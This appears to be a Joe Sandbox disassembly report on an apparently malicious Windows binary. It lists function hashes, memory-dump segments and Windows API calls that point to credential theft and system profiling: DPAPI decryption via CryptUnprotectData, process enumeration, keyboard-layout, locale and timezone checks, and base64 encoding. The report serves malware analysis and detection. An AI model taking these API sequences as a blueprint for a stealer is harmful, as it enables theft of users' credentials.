                              • API String ID: 2567437900-0
                              • Opcode ID: 4f28e24a5ad36fd74a949afd4fe7707ff4188f6121910b87f54e2982f0a42213
                              • Instruction ID: c791978611335b106ec78719f997b05c934a6a622b8c0ff4c5bd74c371eecd00
                              • Opcode Fuzzy Hash: 4f28e24a5ad36fd74a949afd4fe7707ff4188f6121910b87f54e2982f0a42213
                              • Instruction Fuzzy Hash: A0310C71526555DBCB22EF68ED89FDE77B9AF50710F004128BC16BB252CB38EC028B90
                              APIs
                                • Part of subcall function 007D71E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 007D71FE
                              • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 007D2D9B
                              • LocalAlloc.KERNEL32(00000040,00000000), ref: 007D2DAD
                              • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 007D2DBA
                              • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 007D2DEC
                              • LocalFree.KERNEL32(00000000), ref: 007D2FCA
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                              • String ID: /
                              • API String ID: 3090951853-4001269591
                              • Opcode ID: 8c9b97b2a21a38113d520c4beed29c6a285969aeba3a13dd84b13f674a788dda
                              • Instruction ID: 729ec2f8dba4f1aaf01ed4618b975ff7933a1fa8d8d3971ac783dc82418cd4e5
                              • Opcode Fuzzy Hash: 8c9b97b2a21a38113d520c4beed29c6a285969aeba3a13dd84b13f674a788dda
                              • Instruction Fuzzy Hash: 1DB1E671904205CFC715CF18C988B99B7F1BB54325F29C5AAD409AB3A2D77A9D83CF90
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: ?wv$ARz_$Yok~$Y<$[v~$i@^$rog
                              • API String ID: 0-2916331397
                              • Opcode ID: 85531d9129a539727492472d321c4fb59d355646c65012c5cbd60b00c836285b
                              • Instruction ID: 054bbf2ac358445262fcf309de67421ecf5fcd9e5315d2295b4a820392125afa
                              • Opcode Fuzzy Hash: 85531d9129a539727492472d321c4fb59d355646c65012c5cbd60b00c836285b
                              • Instruction Fuzzy Hash: 8DB214F360C2049FE308AE2DEC8567AFBE9EF94720F16493DE6C587744EA3558018697
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: A{$W?L=$`_q~$~$6{$zDg
                              • API String ID: 0-2886597294
                              • Opcode ID: 47d5d510a60e62fed64c0c9b749c53a9b8bf39d4e4972d0a2828989588c22364
                              • Instruction ID: b069db4de1bb4b02dabd4a6c59fa14e340cc2088463632c3b7b4202f0016b093
                              • Opcode Fuzzy Hash: 47d5d510a60e62fed64c0c9b749c53a9b8bf39d4e4972d0a2828989588c22364
                              • Instruction Fuzzy Hash: 13B24AF36082149FE3046E2DEC8567AFBE5EF94720F16863DEAC4C3744EA3598058697
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 007D2C42
                              • RtlAllocateHeap.NTDLL(00000000), ref: 007D2C49
                              • GetTimeZoneInformation.KERNEL32(?), ref: 007D2C58
                              • wsprintfA.USER32 ref: 007D2C83
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                               • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                              • String ID: wwww
                              • API String ID: 3317088062-671953474
                              • Opcode ID: f36d15a4d15dfc227e06e646335e2d5c7a00fb23afb57be8eac94d54e7bd2de7
                              • Instruction ID: c342d26acc43f69a38d3595119ba67807df815b5dbceac596b54e026c0e2dc9f
                              • Opcode Fuzzy Hash: f36d15a4d15dfc227e06e646335e2d5c7a00fb23afb57be8eac94d54e7bd2de7
                              • Instruction Fuzzy Hash: A601F7B1A04644ABCB188B58DC49B6AB779EB84721F00432AF915DB3C0D7741D0086E1
                              APIs
                              • GetProcessHeap.KERNEL32(00000008,00000400), ref: 007B775E
                              • RtlAllocateHeap.NTDLL(00000000), ref: 007B7765
                              • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 007B778D
                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 007B77AD
                              • LocalFree.KERNEL32(?), ref: 007B77B7
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                               • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                              • String ID:
                              • API String ID: 2609814428-0
                              • Opcode ID: f2d54e856d0001ca22f5517ea1f70b910a57b628b0de5e2f225e786e2db7f78f
                              • Instruction ID: e052c62f1434b4ee82d336eb9944b0c35ac33b2701fab7f4f384424a36336703
                              • Opcode Fuzzy Hash: f2d54e856d0001ca22f5517ea1f70b910a57b628b0de5e2f225e786e2db7f78f
                              • Instruction Fuzzy Hash: 45011A75B54308BBEB10DBA49C4AFEA7B7CEB44B11F104155FA09EA2C0DAB0AD00CB90
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                               • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: >YO\$H`6|$V(ff$o"c$k_}
                              • API String ID: 0-707537364
                              • Opcode ID: 036572804f41c479bbea2dcc42f5e12030122fa0e3930b26073387b326251ef3
                              • Instruction ID: fa9b5dc7bf9c25c1b72a13567734baa6dcd17303c1e1205b4c4383dfc8ae0e27
                              • Opcode Fuzzy Hash: 036572804f41c479bbea2dcc42f5e12030122fa0e3930b26073387b326251ef3
                              • Instruction Fuzzy Hash: 3582F3F3A08214AFE3046E2DEC8567AFBE9EF94720F16493DEAC4C3740E63558058697
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                               • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: %/_o$1NrN$>)wy$affx
                              • API String ID: 0-3089346042
                              • Opcode ID: 1998ec333a4c2a1073343a5ee2cb2d43638b2292ca2f135c96044c6134680b99
                              • Instruction ID: 9fdb6bfc8c1ce535364d7c213ee3fb6fada1d8cd8c9b7a30114bb97884bb10ed
                              • Opcode Fuzzy Hash: 1998ec333a4c2a1073343a5ee2cb2d43638b2292ca2f135c96044c6134680b99
                              • Instruction Fuzzy Hash: 8BB207F360C2009FE308AE29EC9567ABBE9EFD4320F16493DE6C4C7744EA3558018697
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                               • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: ;n%$?>6>$?x$@Q<
                              • API String ID: 0-4018685576
                              • Opcode ID: e001557fb27615d59e628e5c9d2231d684fdac3ccf8187c0b593878d1a3bf600
                              • Instruction ID: ff0f87bb7756ced3b0ed9740f2eb00ce1632db3a50e5afec9305694c422f611a
                              • Opcode Fuzzy Hash: e001557fb27615d59e628e5c9d2231d684fdac3ccf8187c0b593878d1a3bf600
                              • Instruction Fuzzy Hash: 63A2E3F390C2109FE704AE29EC8577ABBE5EF94720F16893DEAC8D3744E63558048697
                              APIs
                                • Part of subcall function 007D71E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 007D71FE
                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 007D3A96
                              • Process32First.KERNEL32(00000000,00000128), ref: 007D3AA9
                              • Process32Next.KERNEL32(00000000,00000128), ref: 007D3ABF
                                • Part of subcall function 007D7310: lstrlen.KERNEL32(------,007B5BEB), ref: 007D731B
                                • Part of subcall function 007D7310: lstrcpy.KERNEL32(00000000), ref: 007D733F
                                • Part of subcall function 007D7310: lstrcat.KERNEL32(?,------), ref: 007D7349
                                • Part of subcall function 007D7280: lstrcpy.KERNEL32(00000000), ref: 007D72AE
                              • CloseHandle.KERNEL32(00000000), ref: 007D3BF7
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                               • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                              • String ID:
                              • API String ID: 1066202413-0
                              • Opcode ID: 6b8586b422c4d4f8d49a829e8d9f7183ebd793a769fbd7fd1cc7778a2874435b
                              • Instruction ID: 00c4be734c19351a63658b14f08620302fe19e2f95ee6505f30ac96a5a98eef9
                              • Opcode Fuzzy Hash: 6b8586b422c4d4f8d49a829e8d9f7183ebd793a769fbd7fd1cc7778a2874435b
                              • Instruction Fuzzy Hash: A4810371919244CFC718CF18D988B95B7F1FB44329F29C1AAD4089B3A2D77A9D82CF91
                              APIs
                              • lstrlen.KERNEL32(?,00000001,?,?,00000000,00000000), ref: 007BEA76
                              • CryptStringToBinaryA.CRYPT32(?,00000000,?,00000001,?,?,00000000), ref: 007BEA7E
                              • lstrcat.KERNEL32(007DCFEC,007DCFEC), ref: 007BEB27
                              • lstrcat.KERNEL32(007DCFEC,007DCFEC), ref: 007BEB49
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                               • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$BinaryCryptStringlstrlen
                              • String ID:
                              • API String ID: 189259977-0
                              • Opcode ID: 0bfd833c36da2a70d3e0102a769950993b99213a5dfd9b680888fb9cf44143a8
                              • Instruction ID: 872a4f15c1e57f1ab4d7933cdd85b5ffbe0e20cd6391fa0722c573d9ac9f4783
                              • Opcode Fuzzy Hash: 0bfd833c36da2a70d3e0102a769950993b99213a5dfd9b680888fb9cf44143a8
                              • Instruction Fuzzy Hash: D131E476A14119ABDB10DB98EC85FEFB77EDF84705F0041A9FA09E6240DBB45E04CBA1
                              APIs
                              • CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,?,?,?,?,?), ref: 007D40CD
                              • GetProcessHeap.KERNEL32(00000000,?,?,?), ref: 007D40DC
                              • RtlAllocateHeap.NTDLL(00000000), ref: 007D40E3
                              • CryptBinaryToStringA.CRYPT32(?,?,40000001,?,?,?,?,?,?), ref: 007D4113
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                               • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: BinaryCryptHeapString$AllocateProcess
                              • String ID:
                              • API String ID: 3825993179-0
                              • Opcode ID: fcef8dab2ee6d739183addcae2c7db32dd651e765ce23986e497706aa9bbb378
                              • Instruction ID: e975ef772ad35c991c1ad9a96d061c38c7b531bb85f902f10970fb4a08605748
                              • Opcode Fuzzy Hash: fcef8dab2ee6d739183addcae2c7db32dd651e765ce23986e497706aa9bbb378
                              • Instruction Fuzzy Hash: 78011A70604205BBDB20DFA5DC89BABBBBDEF85311F108199BE0987340DA719D40DBA4
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?,?,00000000,007DA3D0,000000FF), ref: 007D2B8F
                              • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 007D2B96
                              • GetLocalTime.KERNEL32(?,?,00000000,007DA3D0,000000FF), ref: 007D2BA2
                              • wsprintfA.USER32 ref: 007D2BCE
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                               • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateLocalProcessTimewsprintf
                              • String ID:
                              • API String ID: 377395780-0
                              • Opcode ID: a12a56733253778184eda74f2b6d4a7f7ec3464c49af752b66cf3ccba2bc5624
                              • Instruction ID: 9c0ef4ae69b2d7778792d48653898dca969b71b0092dac30ac22054779cc7c0a
                              • Opcode Fuzzy Hash: a12a56733253778184eda74f2b6d4a7f7ec3464c49af752b66cf3ccba2bc5624
                              • Instruction Fuzzy Hash: D50152B2918168ABCB149BC9DD45FBFB7BCFB4CB12F00011AF605A6280E7785940D7B1
                              APIs
                              • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 007B9B3B
                              • LocalAlloc.KERNEL32(00000040,00000000), ref: 007B9B4A
                              • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 007B9B61
                              • LocalFree.KERNEL32 ref: 007B9B70
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmp
